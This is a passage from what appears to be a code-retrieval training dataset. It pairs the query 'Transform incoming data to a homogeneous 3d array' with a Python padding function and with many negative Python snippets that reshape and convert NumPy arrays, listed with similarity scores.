\"corresponds to IQ elements.\"\n f\"Input data contains element with length {data.shape[-1]} != 2.\"\n )\n\n if self._validate:\n if isinstance(self._discriminator, list):\n if self._n_slots != len(self._discriminator):\n raise DataProcessorError(\n f\"The Discriminator node has {len(self._discriminator)} which does \"\n f\"not match the {self._n_slots} slots in the data.\"\n )\n\n return unp.nominal_values(data)", "def provide_data(self):\r\n # import pdb; pdb.set_trace()\r\n # for k, v in self.data:\r\n # print k,v\r\n return [(k, tuple([1] + list(v.shape[1:]))) for k, v in self.data]", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 1] * self.scale", "def _data_reshape(self, data):\n data_offset = [int(size / 2) for size in data.shape[1:]]\n data_diff = [int(size / 2) for size in self.shape]\n data_diff_min = data_diff\n data_diff_max = []\n for i, elem in enumerate(data_diff):\n if self.shape[i] % 2 == 0:\n data_diff_max.append(elem)\n else:\n data_diff_max.append(elem + 1)\n data = data[:, (data_offset[0] - data_diff_min[0]):(data_offset[0] + data_diff_max[0]),\n (data_offset[1] - data_diff_min[1]):(data_offset[1] + data_diff_max[1]),\n (data_offset[2] - data_diff_min[2]):(data_offset[2] + data_diff_max[2])]\n\n if data.shape[1] == 1:\n data = data.reshape(data.shape[0], data.shape[2], data.shape[3])\n return data", "def toarray(self, order=None, out=None):\n d = self._process_toarray_args(order, out)\n for i, row in enumerate(self.rows):\n for pos, j in enumerate(row):\n d[i, j] = self.data[i][pos]\n return d", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n\n self._n_shots = len(data[0])\n self._n_circuits = len(data)\n\n if self._validate:\n if data.shape[:2] != (self._n_circuits, self._n_shots):\n raise DataProcessorError(\n f\"The datum given to {self.__class__.__name__} does not convert \"\n \"of an array with dimension (number of circuit, number of shots).\"\n )\n\n return data", "def vertify(data: list):\n assert len(data) == 4\n n = [float(d) for d in data]\n return np.array([[n[0], n[1]], [n[2], n[1]], [n[2], n[3]], [n[0], n[3]], [n[0], n[1]]])", "def as_matrix(self):\n return self._data", "def provide_data(self):\n return [(k, v.shape) for k, v in self.data]", "def data_for_sorting():\n return RaggedArray([[1, 0], [2, 0], [0, 0]])", "def as_numpy_array_2D(self):\n wx = []\n wy = []\n for wp in self.waypoints:\n wx.append(wp.location.x)\n wy.append(wp.location.y)\n return np.array([wx, wy])", "def getIntArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def flatten_data(X):\n\n return X.reshape((-1, X.shape[-1]))", "def enforce_2D(self,):\n for data in (self.data_obs,self.data_fcst):\n shp = data.shape\n if len(shp) == 2:\n pass \n elif len(shp) == 3:\n if shp[0] == 0:\n data = data[0,:,:]\n elif len(shp) == 4:\n if (shp[0] == 0) and (shp[1] == 0):\n data = data[0,0,:,:]\n else:\n raise FormatError(\"Data needs to be 2D.\")\n return", "def normalize_data(data, n=1):\n\n if isinstance(data, str):\n # TODO: could Antti comment on this?\n # numpy array initialization works unintuitively with strings\n data = np.array([[data]], dtype=object)\n else:\n data = np.atleast_1d(data)\n\n if data.ndim == 1:\n if data.shape[0] == n:\n data = data[:, None]\n else:\n data = data[None, :]\n if n > 1:\n data = np.vstack((data, ) * n)\n else:\n if data.shape[0] != n:\n data = data[None, :]\n if n > 1:\n data = np.vstack((data, ) * n)\n return data", "def _reshape(self, data):\n\n\t\td = np.zeros((32,32,3))\n\t\td_r = data[0:1024].reshape(32,32)\n\t\td_g = data[1024:2048].reshape(32,32)\n\t\td_b = data[2048:].reshape(32,32)\n\n\t\tfor h in range(32):\n\t\t for w in range(32):\n\t\t for c in range(3):\n\n\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\tarray = np.array(d, dtype=np.uint8)\n\t\timg = Image.fromarray(array)\n\t\ttemp = img.resize(size = (64,64))\n\t\td = image.img_to_array(temp)\n\n\t\t#plt.imshow(d)\n\t\t#plt.show()\n\t\treturn d", "def __new__(cls, data):\n arr = np.array(data, dtype=np.float64)\n if arr.shape[1] != 2:\n raise ValueError(\"data must be Nx2 array\")\n\n return arr.view(cls)", "def _convert_data(self, data):\n if isinstance(data, Tensor):\n data = data.asnumpy()\n elif isinstance(data, list):\n data = np.array(data)\n elif isinstance(data, np.ndarray):\n pass\n else:\n raise TypeError('Input data type must be tensor, list or numpy.ndarray')\n return data", "def make_homogeneous(points):\n return np.hstack((points, np.ones((points.shape[0], 1))))", "def make_ndarray(data: list, convert=False):\n data_height = data[0].shape[0]\n data_width = data[0].shape[1]\n if len(data[0].shape) == 3:\n data_channels = data[0].shape[2]\n nd_data = np.zeros((len(data), data_height, data_width, data_channels), dtype=np.float32)\n\n else:\n nd_data = np.zeros((len(data), data_height, data_width), dtype=np.float32)\n\n if convert:\n for _ in range(len(data)):\n nd_data[_] = tf.keras.layers.Lambda(lambda x: x / 255)(data[_])\n\n else:\n for _ in range(len(data)):\n nd_data[_] = data[_]\n\n return nd_data", "def dataset_as_arrays(dataset):\r\n scores = []\r\n lenghts = []\r\n embeddings = []\r\n for row in dataset:\r\n embeddings += [vec for vec in row[0]]\r\n scores.append(float(row[1]))\r\n lenghts.append(row[0].shape[0])\r\n \r\n embeddings = numpy.array(embeddings)\r\n scores = numpy.array(scores)\r\n lenghts = numpy.array(lenghts)\r\n return embeddings, scores, lenghts", "def buffer_data_numpy(self) -> np.ndarray:\n # mask the last 4 bytes to reduce pixel format to mono/color mode and bit width info\n pixel_format = self.data.pixelFormat & 0xFFFF0000\n try:\n arr_dtype, arr_channels = PIXELFORMAT_TO_DTYPE_CHANNELS[pixel_format]\n except KeyError as ex:\n raise NotImplementedError('Pixel format not supported!') from ex\n\n arr_shape = (self.data.height, self.data.width, arr_channels) if arr_channels > 1 \\\n else (self.data.height, self.data.width)\n\n return np.ndarray(buffer=self.buffer_data(),\n dtype=arr_dtype,\n shape=arr_shape)", "def generate_2D(X):\n\n\tno_of_images = len(X)\n\tdata = np.zeros((no_of_images, 28, 28))\n\n\tfor i in xrange(no_of_images):\n\t\tdata[i] = np.copy(X[i].reshape(28, 28))\n\n\treturn data", "def flatten(self):\n xv, yv = np.meshgrid(self.columns, self.index, indexing='xy')\n return np.array([xv.ravel(), yv.ravel(), self.values.ravel()])", "def _make_2x2(self, A11, A12, A21, A22, dtype=float):\n array = np.empty((2,2), dtype=dtype)\n array[0,0] = A11\n array[0,1] = A12\n array[1,0] = A21\n array[1,1] = A22\n return array", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n if self._validate:\n if len(data.shape) <= 1:\n raise DataProcessorError(\n \"The data should be an array with at least two dimensions.\"\n )\n\n return data", "def convert_to_ndarray(entity):\n if isinstance(entity, np.ndarray) and entity.dtype.kind in set('biufc'):\n # entity is numerical ndarray already\n return entity\n if isinstance(entity, np.ndarray) and isinstance(entity.flat[0], qt.Qobj):\n # entity is output from qt.eigenstates\n return convert_esys_to_ndarray(entity)\n if isinstance(entity, list) and isinstance(entity[0], np.ndarray) and isinstance(entity[0].flat[0], qt.Qobj):\n # entity is a list of qt.eigenstates\n return np.asarray([convert_esys_to_ndarray(entry) for entry in entity])\n # possibly we have a list of numerical values or a list of ndarrays\n converted_entity = np.asarray(entity)\n if converted_entity.dtype.kind not in set('biufc'):\n raise TypeError('Unable to convert data to numerical numpy array: ', entity)\n return converted_entity", "def _reshape(self, data):\n\n\t\t\td = np.zeros((32,32,3))\n\t\t\td_r = data[0:1024].reshape(32,32)\n\t\t\td_g = data[1024:2048].reshape(32,32)\n\t\t\td_b = data[2048:].reshape(32,32)\n\n\t\t\tfor h in range(32):\n\t\t\t for w in range(32):\n\t\t\t for c in range(3):\n\n\t\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\t\tarray = np.array(d, dtype=np.uint8)\n\t\t\timg = Image.fromarray(array)\n\t\t\ttemp = img.resize(size = (64,64))\n\t\t\td = image.img_to_array(temp)\n\n\t\t\t#plt.imshow(d)\n\t\t\t#plt.show()\n\t\t\treturn d", "def getFloatArray2D(self) -> typing.List[typing.List[float]]:\n ...", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_shots = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError:\n try:\n # level1 data averaged over shots\n self._n_circs, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"Data given to {self.__class__.__name__} is not likely level1 data.\"\n ) from ex\n\n if self._validate:\n if data.shape[-1] != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} must be a multi-dimensional array\"\n \"of dimension [d0, d1, ..., 2] in which the last dimension \"\n \"corresponds to IQ elements.\"\n f\"Input data contains element with length {data.shape[-1]} != 2.\"\n )\n\n return data", "def _serialize(self, data):\n data = [np.array(j) for j in data]\n self._data_shape_list = [j.shape for j in data]\n serialized_data = [j.ravel() for j in data]\n serialized_data = np.hstack(serialized_data)\n return serialized_data", "def read_2D_comsol_data(self):\n x=[]\n y=[]\n z=[]\n with open(self.file, 'r') as rf:\n reader = csv.reader(rf, delimiter=',')\n for row in reader:\n x.append(row[0])\n y.append(row[1])\n z.append(row[2])\n x = np.asarray((x),dtype=float)\n y = np.asarray((y),dtype=float)\n z = np.asarray((z),dtype=float)\n return x,y,z", "def to_array(self):\n W = self.W\n theta = self.theta\n X = self.X\n Z = np.dot(X, W)\n Y = np.array(self.Y)\n num_samples = X.shape[0]\n K = self.kern.K(X) + self.likelihood.variance * np.eye(num_samples)\n L = scipy.linalg.cho_factor(K, lower=True)\n b = scipy.linalg.cho_solve(L, Y).flatten()\n Ki = scipy.linalg.cho_solve(L, np.eye(num_samples))\n tmp = []\n tmp.append(W.flatten())\n tmp.append(Z.flatten())\n tmp.append(b.flatten())\n tmp.append(Ki.flatten())\n tmp.append(theta.flatten())\n num_input = self.input_dim\n num_samples = self.num_data\n num_active = W.shape[1]\n return np.hstack([[num_input, num_samples, num_active],\n np.hstack(tmp), [self.Y_mean, self.Y_std]])", "def get_field_array(self):\n array_j = []\n array_i = []\n n = 3\n i = self.square_size_y / 2\n while i <= self.field_height:\n if n % 2 == 1:\n j = self.square_size_x / 2\n while j <= self.field_width:\n array_j.append((j, i))\n j += self.square_size_x\n array_i.append(array_j)\n array_j = []\n n += 1\n else:\n j = 0\n while j <= self.field_width:\n array_j.append((j, i))\n j += self.square_size_x\n array_i.append(array_j)\n array_j = []\n n += 1\n i += self.square_size_y\n self.array = array_i\n return array_i", "def getShortArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def _raw_to_arrays(self):\n self.update_geometry()\n if isinstance(self, Molecule):\n # normal qcdb.Molecule\n geom = self.geometry(np_out=True)\n else:\n # psi4.core.Molecule\n geom = np.array(self.geometry())\n mass = np.asarray([self.mass(at) for at in range(self.natom())])\n elem = np.asarray([self.symbol(at) for at in range(self.natom())])\n elez = np.asarray([self.Z(at) for at in range(self.natom())])\n uniq = np.asarray(\n [hashlib.sha1((str(elem[at]) + str(mass[at])).encode('utf-8')).hexdigest() for at in range(self.natom())])\n\n return geom, mass, elem, elez, uniq", "def transform(self, chunks):\n data = np.array([chunk.flatten() for chunk in chunks])\n\n return data", "def as_2d_array(theta):\n v = theta.view(np.float)\n N = theta.shape[0]\n v.shape = (N, - 1)\n # raise an error if v cannot be reshaped without creating a copy\n return v", "def _convert_to_np_array(inputs: Union[float, Tuple[float], np.ndarray], dim):\n outputs = None\n if isinstance(inputs, (tuple, np.ndarray)):\n outputs = np.array(inputs)\n else:\n outputs = np.full(dim, inputs)\n\n if len(outputs) != dim:\n raise ValueError(\"The inputs array has a different dimension {}\"\n \" than provided, which is {}.\".format(len(outputs), dim))\n\n return outputs", "def _convert_to_np_array(inputs: Union[float, Tuple[float], np.ndarray], dim):\n outputs = None\n if isinstance(inputs, (tuple, np.ndarray)):\n outputs = np.array(inputs)\n else:\n outputs = np.full(dim, inputs)\n\n if len(outputs) != dim:\n raise ValueError(\"The inputs array has a different dimension {}\"\n \" than provided, which is {}.\".format(len(outputs), dim))\n\n return outputs", "def _to_arrays(particle, count: int):\n if (\n isinstance(particle, np.ndarray)\n and len(particle.shape) == 2\n and particle.shape[0] == 4\n ):\n # Multiple particles provided\n return particle\n\n elif len(particle) == 4:\n # One particle\n out = np.zeros((4, count))\n out[0] += particle[0]\n out[1] += particle[1]\n out[2] += particle[2]\n out[3] += particle[3]\n\n return out\n\n raise ValueError(\n f\"target shape invalid: should either be a length-4 iterable [x, y, z, t] or a shape (4, N) array\\nGot {type(particle)}\"\n )", "def _data_with_axis(self, axis):\n shpl = list(self.data.shape)\n \n if len(shpl) == 2:\n shpl[1] += 1\n shp = tuple(shpl)\n data = numpy.zeros(shp,dtype=self.data.dtype)\n data[:,1:] = self.data\n data[:,0] = axis.data \n elif len(shpl) == 1:\n shpl.append(2)\n shp = tuple(shpl)\n data = numpy.zeros(shp,dtype=self.data.dtype)\n data[:,1] = self.data\n data[:,0] = axis.data\n else:\n raise Exception(\"Other shapes than (N,) and (N,M) not implemented\")\n return data", "def fit_transform(self, x: Array2D) -> Array2D:", "def makearray(self, *args, **kwargs):\n return _image.image_makearray(self, *args, **kwargs)", "def _check_and_transform_input(self, data):\n if isinstance(data, list):\n if np.array(data).shape == (len(data),):\n if len(data) == 1:\n data = np.array(data).reshape(1, 1)\n data = np.array(data).reshape(len(data), 1)\n else:\n data = np.concatenate(data).reshape(len(data), -1)\n else:\n raise TypeError('Input data should be of type list, but found type {}'.format(type(data)))\n\n return data", "def make_data(self): \n s = numpy.arange(0.0, 10.0, 0.01)\n s = numpy.reshape(s, (10,10,10))\n s = numpy.transpose(s)\n\n v = numpy.zeros(3000, 'd')\n v[1::3] = 1.0\n v = numpy.reshape(v, (10,10,10,3))\n return s, v", "def n2m(a):\n if not isinstance(a, np.ndarray): a = np.array(a)\n return multiprocessing.Array(a.dtype.char, a.flat, lock=False), tuple(a.shape), a.dtype.char, isinstance(a, np.matrix)", "def getByteArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def reformat(dataset):\n x = dataset[:, 1] \n x = np.stack(x) # reshape to (n, mel bands, timesteps)\n x = np.expand_dims(np.moveaxis(x, 1, -1), axis=3) # reformat x to (n, timesteps, mel bands, 1) \n y = dataset[:, 2] \n y = np.moveaxis(np.stack(y), 1, -1) # reformat y to (n, timesteps, 8)\n return x, y", "def parse_array(data, mode):\n if data.ndim == 1:\n if mode == 'image':\n return data.reshape(-1, 1)\n if mode == 'curve':\n return (range(len(data)), data)\n if mode == 'loss':\n return (data, None)\n\n if data.ndim == 3:\n if mode in ('curve', 'loss'):\n msg = f\"In `mode={mode}` array must be 1- or 2-dimensional, got array with ndim={data.ndim}.\"\n raise ValueError(msg)\n\n if data.ndim > 3:\n if mode != 'histogram':\n msg = f\"In `mode={mode}` array must be 1-, 2- or 3-dimensional, got array with ndim={data.ndim}.\"\n raise ValueError(msg)\n\n return data", "def convert_to_array(self): \n self.reads = np.asarray(self.reads, dtype=\"int64\")\n self.sampling=True", "def numpy(self):\n return self.data", "def getLongArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def package_density_matrices(y: Array) -> Array:\n # As written here, only works for (n,n) Arrays\n obj_arr = np.empty(shape=(1), dtype=\"O\")\n obj_arr[0] = y\n return obj_arr", "def flatten(self):\n return DataArray([s for s in self.unstructured()])", "def _deserialize(self, data):\n\n firstInd = 0\n deserialized_data = []\n for shp in self._data_shape_list:\n if len(shp) > 1:\n shift = np.prod(shp)\n elif len(shp) == 0:\n shift = 1\n else:\n shift = shp[0]\n tmp_array = data[firstInd:firstInd+shift]\n tmp_array = tmp_array.reshape(shp)\n deserialized_data.append(tmp_array)\n firstInd += shift\n return deserialized_data", "def _make_array(x):\n try:\n x = np.asfarray(x).squeeze()\n except ValueError:\n pass\n return x", "def _reshape(self, data):\n batch_size, height, width, n_channels = data.shape\n if self._grid_height:\n grid_height = self._grid_height\n else:\n grid_height = int(math.floor(math.sqrt(batch_size)))\n\n grid_width = int(math.ceil(batch_size/grid_height))\n\n if n_channels == 1:\n data = np.tile(data, (1, 1, 1, 3))\n n_channels = 3\n\n if n_channels != 3:\n raise ValueError('Image batch must have either 1 or 3 channels, but '\n 'was {}'.format(n_channels))\n\n shape = (height * grid_height, width * grid_width, n_channels)\n buf = np.full(shape, 255, dtype=np.uint8)\n multiplier = 1 if data.dtype in (np.int32, np.int64) else 255\n\n for k in range(batch_size):\n i = k // grid_width\n j = k % grid_width\n arr = data[k]\n x, y = i * height, j * width\n buf[x:x + height, y:y + width, :] = np.clip(\n multiplier * arr, 0, 255).astype(np.uint8)\n\n if self._zoom > 1:\n buf = buf.repeat(self._zoom, axis=0).repeat(self._zoom, axis=1)\n return buf" ]
[ "0.69984454", "0.69612616", "0.69326127", "0.68554795", "0.68044513", "0.6771031", "0.6694132", "0.6677301", "0.65618455", "0.64136314", "0.64136314", "0.6397039", "0.6386304", "0.63829464", "0.63655895", "0.63461405", "0.6290972", "0.6282495", "0.6213077", "0.6213077", "0.61537564", "0.61509496", "0.61224943", "0.61139107", "0.6036738", "0.60173273", "0.6012816", "0.60066086", "0.5985646", "0.5983536", "0.5980992", "0.5976893", "0.5964275", "0.59587497", "0.5955035", "0.5950386", "0.59471554", "0.59453475", "0.5924999", "0.59149164", "0.5909023", "0.5905758", "0.5897151", "0.58894324", "0.5884572", "0.5881802", "0.5880827", "0.5870219", "0.58357733", "0.5810608", "0.5808006", "0.57970107", "0.5790539", "0.5787517", "0.5786072", "0.5768794", "0.57639354", "0.57602423", "0.5760063", "0.575568", "0.57506335", "0.5742508", "0.57425076", "0.5732822", "0.5728535", "0.5727184", "0.5722537", "0.5718366", "0.5715984", "0.57127404", "0.56881016", "0.56844825", "0.5680941", "0.5680732", "0.56781816", "0.5677494", "0.56738234", "0.56737655", "0.56732917", "0.56701016", "0.5658189", "0.5655407", "0.5655407", "0.56543934", "0.56512415", "0.56500113", "0.56490517", "0.5644514", "0.56396914", "0.56305575", "0.5627493", "0.56242615", "0.56115645", "0.56092477", "0.56070733", "0.5605156", "0.5603914", "0.5597563", "0.5585879", "0.55851775", "0.5581067" ]
0.0
-1
Transform incoming data to a homogeneous 3d array.
def transform(self, X): n = len(X) Xt = self.pad_value * np.ones((n,) + self.max_size, dtype=self.dtype) for i, arr in enumerate(X): m = min(self.max_size[0], len(arr)) if not m: continue arr = np.array(arr[:m], dtype=object) for j, vec in enumerate(arr): n = min(self.max_size[1], len(vec)) Xt[i, j, :n] = vec[:n] return Xt
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cvt2array(tuples):\n rc = []\n for t in tuples:\n rc.append(point3d(np.float32(t[X]), np.float32(t[Y]), np.float32(t[Z])))\n return rc", "def mat_2d_to_3d(x, agg_num, hop):\n # Pad to at least one block. \n len_x, n_in = x.shape\n if (len_x < agg_num):\n x = np.concatenate((x, np.zeros((agg_num - len_x, n_in))))\n \n # Segment 2d to 3d. \n len_x = len(x)\n i1 = 0\n x3d = []\n while (i1 + agg_num <= len_x):\n x3d.append(x[i1 : i1 + agg_num])\n i1 += hop\n return np.array(x3d)", "def make_data(self, data):\n return array(data, dtype=float32)", "def convert_1d_to_3d(data_X, data_Y):\n\n data_X = data_X.tocsr()\n \n data_dim_x = [] # slices along x-axis (has shape of (total_trials * dim_x, dim_z, dim_y))\n data_dim_x_label = [] # contains (total_trials * dim_x) labels\n data_dim_y = [] # slices along y-axis (has shape of (total_trials * dim_y, dim_z, dim_x))\n data_dim_y_label = [] # contains (total_trials * dim_y) labels\n data_dim_z = [] # slices along z-axis (has shape of (total_trials * dim_z, dim_y, dim_x))\n data_dim_z_label = [] # contains (total_trials * dim_z) labels\n\n for num_trial in range(data_X.shape[0]):\n label = data_Y[num_trial]\n data_1d = data_X[num_trial]\n data_3d = np.squeeze(np.asarray(data_1d.todense())).reshape((dim_z, dim_y, dim_x))\n for x in range(dim_x):\n x_slice = data_3d[:,:,x]\n # append only if the slice is not empty \n if x_slice.sum() != 0:\n data_dim_x.append(data_3d[:, :, x])\n data_dim_x_label.append(label)\n for y in range(dim_y):\n y_slice = data_3d[:, y, :]\n if y_slice.sum() != 0:\n data_dim_y.append(data_3d[:, y, :])\n data_dim_y_label.append(label)\n for z in range(dim_z):\n z_slice = data_3d[:, :, z]\n if z_slice.sum() != 0:\n data_dim_z.append(data_3d[z, :, :])\n data_dim_z_label.append(label)\n\n return np.array(data_dim_x), np.array(data_dim_x_label), \\\n np.array(data_dim_y), np.array(data_dim_y_label), \\\n np.array(data_dim_z), np.array(data_dim_z_label)", "def _to_numpy_ndarray(cls, data):\n if isinstance(data, np.ndarray):\n return data\n arr = np.array(data, dtype=np.float)\n if len(arr.shape) == 1:\n arr = np.reshape(arr, newshape=(1, arr.shape[0]))\n return arr", "def _make_3d_series(x: np.ndarray) -> np.ndarray:\n num_dims = x.ndim\n if num_dims == 1:\n shape = x.shape\n _x = np.reshape(x, (shape[0], 1, 1))\n elif num_dims == 2:\n shape = x.shape\n _x = np.reshape(x, (shape[0], 1, shape[1]))\n elif num_dims > 3:\n raise ValueError(\n \"The matrix provided has more than 3 dimensions. This is not\"\n \"supported. Please provide a matrix with less than \"\n \"3 dimensions\"\n )\n else:\n _x = x\n return _x", "def augment_data(self,data):\n d = np.empty([data.shape[0]+2,data.shape[1]+2])\n d[1:-1,1:-1] = data\n d[0,1:-1] = data[0,:]\n d[1:-1,0] = data[:,0]\n d[-1,1:-1] = data[-1,:]\n d[1:-1,-1] = data[:,-1]\n d[0,0] = data[0,0]\n d[-1,-1] = data[-1,-1]\n d[0,-1] = data[0,-1]\n d[-1,0] = data[-1,0]\n return d", "def GPy_reformat_3D(array):\r\n n_timesteps = np.shape(array)[-1]\r\n if len(np.shape(array)) == 1:\r\n array = array.reshape(n_timesteps, 1)\r\n return [array, array, array]\r\n elif len(np.shape(array)) == 2:\r\n array = array.T\r\n array1 = array[:, 0, None]\r\n array2 = array[:, 1, None]\r\n array3 = array[:, 2, None]\r\n return [array1, array2, array3]\r\n else:\r\n return print(\"Error in GPy_reformat, input array is wrong shape.\")", "def torchlike_data(data):\n\n #Inputun kanal değeri alınır\n n_channels = data.shape[2] ### 3\n # print(\"n_channels=\", n_channels) #(224,224,3)\n\n #Inputla benzer türde ve boyutta boş bir dizi oluşturuluyor.\n torchlike_data_output = np.empty((n_channels,data.shape[0],data.shape[1]))\n # print(\"torchlike_data_output\",torchlike_data_output[0])\n \n #print(\"xxxxxxxxxxxxxxx\",torchlike_data_output[0].shape) \n #\n #\n #numpy.empty(shape, dtype=float, order='C', *, like=None)\n \n \n #her kanal için\n for i in range(n_channels):\n \n #datanın niçindeki veriler torchlika_data_output a aktarılır\n torchlike_data_output[i] = data[:,:,i]\n return torchlike_data_output", "def transform3D(x: float, y: float, z: float, R: np.array) -> np.array:\n T = np.zeros((4, 4))\n T[:3, :3] = R\n T[:, 3] = [x, y, z, 1.0]\n\n return T", "def split_3d_array_into_channels(arr):\n return [arr[:, :, i] for i in range(arr.shape[-1])]", "def funcify_3d(arrayin, func2d):\r\n assert(len(arrayin.shape) >= 2)\r\n elem = arrayin.size / (arrayin.shape[-1] * arrayin.shape[-2])\r\n if elem == 2 :\r\n arrayout = func2d(arrayin)\r\n else :\r\n array = arrayin.flatten().reshape( (elem, arrayin.shape[-2], arrayin.shape[-1]))\r\n arrayout = []\r\n for i in range(elem):\r\n arrayout.append(func2d(array[i]))\r\n arrayout = np.array(arrayout).reshape( arrayin.shape )\r\n return arrayout", "def process(self, data):\n data = np.atleast_2d(data)\n\n if self.orientation == 'row':\n return data\n else:\n return data.T", "def carla_xyz_to_ndarray(xyz: Any) -> np.ndarray:\n return np.asarray(\n [xyz.x, xyz.y, xyz.z],\n dtype=np.float32,\n )", "def make_data(self): \n s = numpy.arange(0.0, 10.0, 0.01)\n s = numpy.reshape(s, (10,10,10))\n s = numpy.transpose(s)\n\n v = numpy.zeros(3000, 'd')\n v[1::3] = 1.0\n v = numpy.reshape(v, (10,10,10,3))\n return s, v", "def _reshape(self, data):\n\n\t\td = np.zeros((32,32,3))\n\t\td_r = data[0:1024].reshape(32,32)\n\t\td_g = data[1024:2048].reshape(32,32)\n\t\td_b = data[2048:].reshape(32,32)\n\n\t\tfor h in range(32):\n\t\t for w in range(32):\n\t\t for c in range(3):\n\n\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\tarray = np.array(d, dtype=np.uint8)\n\t\timg = Image.fromarray(array)\n\t\ttemp = img.resize(size = (64,64))\n\t\td = image.img_to_array(temp)\n\n\t\t#plt.imshow(d)\n\t\t#plt.show()\n\t\treturn d", "def reshape_tensor3d(self, x):\n if self.dim_ordering == 'th':\n tx = K.reshape(x, (-1, self.nb_filter, self.cols * self.rows))\n else:\n tx = K.reshape(x, (-1, self.cols * self.rows, self.nb_filter))\n tx = K.transpose(tx, (0,2,1))\n if self.cov_mode == 'channel' or self.cov_mode =='mean' or self.cov_mode =='pmean':\n return tx\n else:\n return K.transpose(tx, (0,2,1))", "def config_to_array(data):\n return np.array(data[\"data\"]).reshape(data[\"rows\"], data[\"cols\"])", "def _reshape(self, data):\n\n\t\t\td = np.zeros((32,32,3))\n\t\t\td_r = data[0:1024].reshape(32,32)\n\t\t\td_g = data[1024:2048].reshape(32,32)\n\t\t\td_b = data[2048:].reshape(32,32)\n\n\t\t\tfor h in range(32):\n\t\t\t for w in range(32):\n\t\t\t for c in range(3):\n\n\t\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\t\tarray = np.array(d, dtype=np.uint8)\n\t\t\timg = Image.fromarray(array)\n\t\t\ttemp = img.resize(size = (64,64))\n\t\t\td = image.img_to_array(temp)\n\n\t\t\t#plt.imshow(d)\n\t\t\t#plt.show()\n\t\t\treturn d", "def get_data(data):\n\n np_data = np.array(data)\n array = []\n\n for i in range(0, np_data.shape[1]):\n array.append(np_data[:, i])\n\n return np.array(array)", "def get_data(data):\n\n np_data = np.array(data)\n array = []\n\n for i in range(0, np_data.shape[1]):\n array.append(np_data[:, i])\n\n return np.array(array)", "def reshape_tensor3d(self, x):\n if self.dim_ordering == 'th':\n tx = K.reshape(x, (-1, self.nb_filter, self.cols * self.rows))\n else:\n tx = K.reshape(x, (-1, self.cols * self.rows, self.nb_filter))\n tx = K.transpose(tx, (0, 2, 1))\n if self.bilinear_mode == 'channel' or self.bilinear_mode == 'mean' or self.bilinear_mode == 'pmean':\n return tx\n else:\n return K.transpose(tx, (0, 2, 1))", "def flatten_array(self):\n numel = self.xyz_array[:, :, 0].size # Number of elements in dataset\n self.flat_array = np.zeros([self._len_z, numel]) # Create array to hold flattened array\n\n # Loop through each dimension (dataset) and flatten it into new array\n for dim in range(self._len_z):\n self.flat_array[dim, :] = np.ravel(self.xyz_array[:, :, dim])", "def Reshape(xdata, ydata, zdata):\r\n N = zdata.shape[0]\r\n Nx = list(ydata).count(ydata[0])\r\n Ny = N/Nx\r\n zz = np.copy(zdata)\r\n zz.shape = (Ny,Nx)\r\n xx = xdata[:Nx]\r\n yy = np.zeros(Ny)\r\n for u in range(Ny):\r\n yy[u] = ydata[Nx*u]\r\n return xx,yy,zz", "def transform(self, data):\n unflattened = [unflatten_vec(d) for d in data]\n return numpy.array([self.signature(uf)\n for uf in unflattened])", "def split_3Darray(array2d, L_window):\n N, ch = array2d.shape\n n_windows = N//L_window\n array3d = np.zeros((n_windows, L_window, ch))\n for i in range(n_windows):\n array3d[i]=array2d[i*L_window: (i+1)*L_window,:] \n \n return array3d", "def ndarray_to_vector3d(array: np.ndarray) -> carla.Vector3D: # pylint: disable=no-member\n return carla.Vector3D(*list(map(float, array))) # pylint: disable=no-member", "def data_reshape(image):\n image_mat = []\n if image.shape[-1] == 3:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j[0], j[1], j[2]])\n else:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j])\n return np.array(image_mat)", "def dataConvertToNumpy( self ):\n self.featureNumpy = np.asarray( self.feature )\n self.ClassNumpy = np.asarray( self.Class )", "def _to_ndarray(data):\n return np.atleast_1d(getattr(data, 'values', data))", "def to_numpy(data):\n fields = [\n \"x\", \"y\", \"z\",\n \"proximity\"\n ]\n return np.array([[row[field] for field in fields] for row in data])", "def nested_to_3d_numpy(X, a=None, b=None):\n return np.stack(\n X.iloc[a:b].applymap(lambda cell: cell.to_numpy()).apply(lambda row: np.stack(row), axis=1).to_numpy())", "def cube_data(self):\n cube_data = copy.deepcopy(self.data)\n cube_data.shape = [self.nints * self.ngroups, self.rows, self.columns]\n return cube_data", "def vertify(data: list):\n assert len(data) == 4\n n = [float(d) for d in data]\n return np.array([[n[0], n[1]], [n[2], n[1]], [n[2], n[3]], [n[0], n[3]], [n[0], n[1]]])", "def _build(self):\n ary = np.zeros( (3,3,3), float )\n ary[0,0,0] = ary[1,1,1] = ary[0,1,2] = ary[1,0,2] = 1.\n ary[0,2,0] = ary[0,2,2] = ary[2,0,0] = ary[2,0,2] = 0.5\n ary[1,2,1] = ary[1,2,2] = ary[2,1,1] = ary[2,1,2] = 0.5\n ary[2,2,0] = ary[2,2,1] = 0.25\n ary[2,2,2] = 0.5\n return ary", "def mesh_flatten(x):\r\n N, V, dims = x.shape\r\n\r\n mesh_data = x\r\n 